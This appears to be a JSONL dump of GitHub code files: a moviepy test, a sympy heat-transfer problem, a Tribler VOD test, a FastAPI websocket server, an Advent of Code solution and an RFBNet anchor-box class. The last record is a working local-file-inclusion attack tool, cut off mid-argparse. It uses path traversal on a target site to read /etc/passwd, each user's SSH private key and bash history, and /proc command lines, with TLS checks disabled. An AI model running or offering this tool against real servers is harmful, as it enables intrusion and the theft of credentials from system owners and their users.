+{"seq_id":"27402002697","text":"import moviepy.editor as mpy\nimport gizeh as gz\n\nVIDEO_SIZE = (1920, 1080)\nWHITE = (255, 255, 255)\nDURATION = 5\nKIDS_PIC = \"./assets/cyberscooty-two-kids.png\"\nTEACHER_PIC = \"./assets/teacher.png\"\n\nif __name__ == '__main__':\n kids_pic = mpy.ImageClip(KIDS_PIC). \\\n set_position((15,900)).resize(width=200)\n\n teacher_pic = mpy.ImageClip(KIDS_PIC). \\\n set_position((1900,900)).resize(width=200)\n\n video = mpy.CompositeVideoClip(\n [\n kids_pic,\n teacher_pic\n ],\n size=VIDEO_SIZE).\\\n on_color(\n color=WHITE,\n col_opacity=1).set_duration(DURATION)\n\n video.write_videofile('sample.mp4', fps=10)\n","repo_name":"nishantnischaya/YoutubeAutogenerated","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"35501826900","text":"from sympy import symbols, diff, Function, pi, dsolve, solve, integrate\n\nheight = 30e-2\nd_1 = 8.2e-2\nd_2 = 13e-2\nt_1 = 20\nt_2 = 520\nlambda_ = 100\n\nA = Function('A')\nt = symbols('t')\nPhi = symbols('Phi')\ny = symbols('y')\n\neq1 = diff(A(y), y, 2)\nA = solve(dsolve(eq1, ics={A(0): pi/4*d_2**2, A(height): pi/4*d_1**2}), A(y))[0]\n# Phi = -lambda_*A*diff(t, y)\nresult1 = integrate(-1/(lambda_ * A), (y, 0, height))\nresult2 = integrate(1, (t, t_2, t_1))\nPhi = result2 / result1\nprint(f'Phi = {Phi:.2f} W')\n","repo_name":"hustquick/HeatTransfer","sub_path":"Problems/pr02-30.py","file_name":"pr02-30.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"}
+{"seq_id":"22630954220","text":"# Written by Arno Bakker \n# see LICENSE.txt for license information\n\nfrom threading import currentThread\n\nfrom Tribler.Core.API import *\nfrom Tribler.Video.VideoServer import VideoHTTPServer\n\n\ndef state_callback(d,ds):\n print >>sys.stderr,\"main: Stats\",dlstatus_strings[ds.get_status()],ds.get_progress(),\"%\",ds.get_error()\n\ndef vod_ready_callback(d,event,params):\n print >>sys.stderr,\"main: VOD ready callback called\",currentThread().getName(),\"###########################################################\",params[\"mimetype\"]\n\n \"\"\"\n f = open(\"video.avi\",\"wb\")\n while True:\n data = stream.read()\n print >>sys.stderr,\"main: VOD ready callback: reading\",type(data)\n print >>sys.stderr,\"main: VOD ready callback: reading\",len(data)\n if len(data) == 0:\n break\n f.write(data)\n f.close()\n stream.close()\n \"\"\"\n\n videoserv = VideoHTTPServer.getInstance()\n videoserv.set_inputstream('video/mpeg',params[\"stream\"],None)\n \n\nif __name__ == \"__main__\":\n \n videoserv = VideoHTTPServer.getInstance() # create\n videoserv.background_serve()\n \n s = Session()\n \n if sys.platform == 'win32':\n tdef = TorrentDef.load('bla.torrent')\n else:\n tdef = TorrentDef.load('/tmp/bla.torrent')\n dcfg = DownloadStartupConfig.get_copy_of_default()\n #dcfg.set_saveas('/arno')\n dcfg = DownloadStartupConfig.get_copy_of_default()\n dcfg.set_video_start_callback(vod_ready_callback)\n #dcfg.set_selected_files('MATRIX-XP_engl_L.avi') # play this video\n #dcfg.set_selected_files('field-trip-west-siberia.avi')\n \n d = s.start_download(tdef,dcfg)\n d.set_state_callback(state_callback,1)\n #d.set_max_upload(100)\n \n time.sleep(10)\n \n \"\"\" \n d.stop()\n print \"After stop\"\n time.sleep(5)\n d.restart()\n \"\"\"\n time.sleep(2500)\n \n","repo_name":"csko/Tribler-gossip","sub_path":"Tribler/Test/API/test_vod.py","file_name":"test_vod.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"19"}
+{"seq_id":"32934264937","text":"from typing import List\n\nimport uvicorn\nfrom fastapi import Depends\nfrom starlette.concurrency import run_until_first_complete\nfrom starlette.websockets import WebSocket\n\nfrom app import app, broadcast\nfrom auth import get_user_from_token\nfrom dependencies import get_user_repository, get_rooms_repo\nfrom schema import RoomDTO\n\n\n@app.get(\"/api/rooms\", response_model=List[RoomDTO])\nasync def get_rooms(\n user=Depends(get_user_from_token),\n rooms_repository=Depends(get_rooms_repo),\n repository=Depends(get_user_repository)\n):\n user = repository.get_by_login(login=user)\n if not user:\n raise Exception()\n return await rooms_repository.get_all()\n\n\nasync def events_ws_receiver(websocket, channel: str):\n async for message in websocket.iter_text():\n await broadcast.publish(channel=channel, message=message)\n\n\nasync def events_ws_sender(websocket, channel: str):\n async with broadcast.subscribe(channel=channel) as subscriber:\n async for event in subscriber:\n await websocket.send_text(event.message)\n\n\n@app.websocket(\"/{channel_id}\")\nasync def websocket_endpoint(websocket: WebSocket, channel_id: str):\n await websocket.accept()\n await run_until_first_complete(\n (events_ws_receiver, {\"websocket\": websocket, \"channel\": channel_id}),\n (events_ws_sender, {\"websocket\": websocket, \"channel\": channel_id}),\n )\n\n\nif __name__ == \"__main__\":\n uvicorn.run(app, host=\"0.0.0.0\", port=8000)\n","repo_name":"StephanYorchenko/health-manager-back","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71283613165","text":"#%%\ndef openInput():\n with open('input.txt') as f:\n return f.read()\n\nclass House():\n def __init__(self, x, y) -> None:\n self.x = x\n self.y = y\n self.gifts = 0\n \n def addGift(self):\n self.gifts += 1\n\nclass Houses():\n def __init__(self) -> None:\n self.houses: list[House] = []\n\n def addHouse(self, house: House):\n self.houses.append(house)\n\n def getHouse(self, x, y) -> bool:\n for house in self.houses:\n if house.x == x and house.y == y:\n return house\n new_house = House(x,y)\n self.houses.append(new_house)\n return new_house\n\ndef move(x, y, cmd):\n if cmd == '<':\n x -= 1\n elif cmd == '>':\n x += 1\n elif cmd == '^':\n y += 1\n elif cmd == 'v':\n y -= 1\n return x, y\n\n\nline = openInput()\nhouses = Houses()\n\n# first house\nx, y = 0, 0\nhouse = houses.getHouse(x,y)\nhouse.addGift()\n\n# the rest\nfor cmd in line:\n x, y = move(x, y, cmd)\n house = houses.getHouse(x,y)\n house.addGift()\n # print(f'added gift at {x=}, {y=}')\n\nprint(len(houses.houses))\n\n# %%\n","repo_name":"jrkell/advent-of-code","sub_path":"2015/day-3/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"12313997145","text":"import torch\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom math import sqrt as sqrt\nfrom itertools import product as product\n\n\nclass PriorBox(object):\n \"\"\"Compute priorbox coordinates in center-offset form for each source\n feature map.生成feature map上预定义的anchor box\n Note:\n This 'layer' has changed between versions of the original SSD\n paper, so we include both versions, but note v2 is the most tested and most\n recent version of the paper.\n\n \"\"\"\n def __init__(self, cfg):\n super(PriorBox, self).__init__()\n self.image_size = cfg['min_dim'] # 输入RFBNet的图像尺度,这里假设512\n # number of priors for feature map location (300有6个,而512有7个feature map)\n self.num_priors = len(cfg['aspect_ratios']) # 各个feature map上预定义的anchor长宽比清单,与检测分支的数量对应\n self.variance = cfg['variance'] or [0.1]\n self.feature_maps = cfg['feature_maps'] # 特征金字塔层上各个feature map尺度\n self.min_sizes = cfg['min_sizes'] # 预定义的anchor尺度���短边,越深层感受野越大故分配的anchor尺度越大\n # SSD中6个default bbox如何定义的?2:1 + 1:2 + 1:3 + 3:1+两个1:1长宽比的anchor,\n # 但SSD定义了一个根号2尺度的anchor,max_sizes类似,但并不是严格对应的\n self.max_sizes = cfg['max_sizes'] # 预定义的anchor尺度的长边\n self.steps = cfg['steps'] # 每个尺度检测特征图分支的stride(即与输入的缩小倍数)\n self.aspect_ratios = cfg['aspect_ratios'] # feature map上每个pix上预定义6/7个anchor\n self.clip = cfg['clip'] # 位置校验\n for v in self.variance:\n if v <= 0:\n raise ValueError('Variances must be greater than 0')\n\n def forward(self):\n mean = [] # 用于保存所有feature map上预定义的anchor\n for k, f in enumerate(self.feature_maps): #对特征金字塔的各个检测分支,每个feature map上each-pixel都做密集anchor采样\n for i, j in product(range(f), repeat=2): # 笛卡尔积repeat后的f,组成很多二维元组,可以开始密集anchor采样了\n f_k = self.image_size / self.steps[k] #当前检测分支的特征图大小\n cx = (j + 0.5) / f_k #当前检测分支的归一化后的anchor中心坐标cx\n cy = (i + 0.5) / f_k # 以上三步操作,就相当于从feature map位置映射至归一化原图,float型\n\n\n s_k = self.min_sizes[k]/self.image_size #归一化后的当前检测分支对应的anchor的min_size\n mean += [cx, cy, s_k, s_k] # 第一个anchor添加,1:1长宽比\n\n # aspect_ratio: 1\n # rel size: sqrt(s_k * s_(k+1))\n s_k_prime = sqrt(s_k * (self.max_sizes[k]/self.image_size)) #sqrt(min_sizes[k]*max_sizes[k]/(512*512))\n mean += [cx, cy, s_k_prime, s_k_prime]# 第二个anchor添加,1:1长宽比,尺度与第一个anchor不一样,和SSD对应上了~~~\n\n # rest of aspect ratios\n for ar in self.aspect_ratios[k]:#不管是[2]还是[2,3]都循环当前aspect_ratio内部元素\n mean += [cx, cy, s_k*sqrt(ar), s_k/sqrt(ar)]# 如是[2,3],生成2:1和3:1的anchor,如是[2]则生成2:1的anchor\n mean += [cx, cy, s_k/sqrt(ar), s_k*sqrt(ar)]# 如是[2,3],生成1:2和1:3,如是[2],生成1:2的anchor\n\n # 总结:\n # 1 每个检测分支feature map上each-pixel对应6 / 7个anchor,长宽比:2:1 + 1:2 + 1:3 + 3:1 + 1:1 + 1:1,后两个1:1的anchor对应的尺度有差异;\n # 2 跟SSD还是严格对应的,每个feature map上anchor尺度唯一(2:1 + 1:2 + 1:3 + 3:1 + 1:1这五个anchor的尺度还是相等的,面积相等),仅最后的1:1 anchor尺度大一点;\n # 3 所有feature map上所有预定义的不同尺度、长宽比的anchor保存至mean中;\n\n # back to torch land\n output = torch.Tensor(mean).view(-1, 4) # 操作类似reshape,规则化输出\n if self.clip:\n output.clamp_(max=1, min=0)# float型坐标校验\n return output\n","repo_name":"2585157341/RFBNet-master_Chinese_note","sub_path":"layers/functions/prior_box.py","file_name":"prior_box.py","file_ext":"py","file_size_in_byte":4248,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"19"}
+{"seq_id":"25409237424","text":"from multiprocessing import Pool\nimport requests\nimport argparse\nimport signal\nimport re\n\nclass LFI_Hunter():\n def __init__(self,url,file,lfi,pid,output_file,threads,header,cookie,user_agent,proxy):\n self.url = url\n self.file = file\n self.lfi = lfi\n self.pid = pid\n self.output_file = output_file\n self.check = self.size_check()\n self.threads = threads\n self.header = header\n self.cookie = cookie\n self.user_agent = user_agent\n self.proxy = proxy\n\n self.headers,self.proxy_set = self.create_headers()\n self.set_processes_wordlist()\n self.set_processes_procs()\n self.get_history()\n self.get_keys()\n\n def create_headers(self):\n headers = {\n \"Connection\":\"close\"\n }\n\n proxy_set = {}\n\n if args.a:\n headers[\"User-Agent\"] = self.user_agent\n\n if args.p:\n proxy_set = {\n \"http\": \"http://\" + self.proxy\n }\n \n if args.c:\n headers['Cookie'] = self.cookie\n\n if args.H:\n header_list = self.header.split(': ')\n list_length = len(header_list) - 1 \n for each_header in range(0,list_length):\n headers[header_list[each_header]] = header_list[each_header + 1]\n\n return headers,proxy_set\n \n def size_check(self):\n requests.packages.urllib3.disable_warnings()\n if args.o:\n file_write = open(self.output_file,\"w\")\n file_write.close()\n\n check = self.url + self.lfi + \"/9fX1SxbT61qUDQKjpDWo8ApV3YTVLpz5ThM3wJ6XOqlaz\"\n req_lfi = requests.get(check, allow_redirects = False, verify=False)\n page_size = len(req_lfi.text)\n\n return page_size\n\n def write_output(self,line1,line2,line3):\n print(line1)\n print(line2)\n print(line3)\n out_file = open(self.output_file,'a')\n out_file.write(line1)\n out_file.write(\"\\n\")\n out_file.write(line2)\n out_file.write(line3)\n out_file.write(\"\\n\")\n out_file.close()\n\n def get_keys(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for SSH keys for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.ssh/id_rsa\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mSSH Keys for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No SSH keys found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def get_history(self):\n requests.packages.urllib3.disable_warnings()\n find_users = self.url + self.lfi + \"/etc/passwd\"\n req_lfi = requests.get(find_users, allow_redirects = False, verify=False)\n search = re.findall(\"/home/(.*):/bin/\",req_lfi.text)\n \n for each_user in search:\n print(\"Searching for history files for user(s) \" + each_user)\n ssh_payload = self.url + self.lfi + \"/home/\" + each_user + \"/.bash_history\"\n req_ssh = requests.get(ssh_payload, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n \n if len(req_ssh.text) > self.check:\n line1 = \"Found: \\x1b[6;30;42mHistory File for \" + each_user.strip() + \"\\x1b[0m\"\n line2 = \"\\n\" + req_ssh.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n \n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n else:\n print(\"No history file found for user(s) \" + each_user.strip())\n print(\"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\")\n\n def set_processes_wordlist(self):\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n with open(self.file,'r') as wordlist_file: \n for each_word in wordlist_file: \n wordlist.append(each_word.rstrip())\n\n try:\n start = pool.map_async(self.lfihunt,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def set_processes_procs(self):\n print(\"Searching for running processes in /proc/$(PID)/cmdline\")\n original_sigint_handler = signal.signal(signal.SIGINT, signal.SIG_IGN)\n pool = Pool(processes=int(self.threads)) \n signal.signal(signal.SIGINT, original_sigint_handler)\n\n wordlist = []\n for each_pid in range(0,int(self.pid)): \n wordlist.append(each_pid)\n\n try:\n start = pool.map_async(self.get_procs,wordlist)\n except KeyboardInterrupt:\n pool.terminate()\n else:\n pool.close()\n pool.join()\n\n def get_procs(self,each_pid):\n requests.packages.urllib3.disable_warnings()\n process = self.url + self.lfi + \"/proc/\" + str(each_pid) + \"/cmdline\"\n req_proc = requests.get(process, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n if len(req_proc.text) > self.check:\n line1 = \"Process: \\x1b[6;30;42m/proc/\" + str(each_pid) + \"/cmdline\\x1b[0m\"\n line2 = \"\\n\" + req_proc.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\n def lfihunt(self,each_line):\n requests.packages.urllib3.disable_warnings() \n req_lfi = requests.get(self.url + self.lfi + each_line, headers=self.headers, proxies=self.proxy_set, allow_redirects = False, verify=False)\n\n if len(req_lfi.text) > self.check:\n line1 = \"File: \\x1b[6;30;42m\" + each_line + \"\\x1b[0m\"\n line2 = \"\\n\" + req_lfi.text + \"\\n\"\n line3 = \"\\033[31m\" + \"*\" * 100 + \"\\x1b[0m\"\n if args.o:\n self.write_output(line1,line2,line3)\n else:\n print(line1)\n print(line2)\n print(line3)\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='LFI Enumeration Tool')\n parser.add_argument('-u', metavar='', help='Example: -u http://lfi.location/?parameter=', required=True)\n parser.add_argument('-w', metavar='',help=\"Example: -w unix.txt\", required=True)\n parser.add_argument('-l', metavar='',help=\"Example: -l ../../../../../\", required=True)\n parser.add_argument('-pid', metavar='',default='1000',help=\"Default is 1000. Example: -pid 2000\", required=False)\n parser.add_argument('-o', metavar='